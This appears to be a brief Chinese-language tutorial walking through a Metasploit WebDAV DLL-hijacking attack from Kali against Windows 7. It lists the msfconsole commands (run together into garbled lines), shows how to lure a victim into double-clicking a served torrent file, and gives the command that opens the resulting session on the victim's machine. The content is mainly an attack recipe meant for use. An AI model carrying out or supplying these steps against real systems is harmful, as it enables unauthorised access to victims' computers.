本文共 438 字,大约阅读时间需要 1 分钟。
参考资源:
环境:kali2018.1(攻击者),win7任意版本(目标,受害者)
说明:#表示root权限,$表示普通用户权限
操作:
# msfconsoleuse exploit/windows/browser/webdav_dll_hijackerset extensions torrentset srvhost 攻击者的IPexploit
此时看到生成的文件被自动放在了一个路径下(需要至少有初中的英文水准去阅读回显内容,才能找到路径)
受害者使用资源管理或者浏览器取访问这个路径 受害者双击种子文件,进行访问。(不少用户的习惯就是这样) 攻击者可以看到,接收到一个会话连接。sessions -i 1
成功访问受害者,并且得到了访问种子的用户的权限。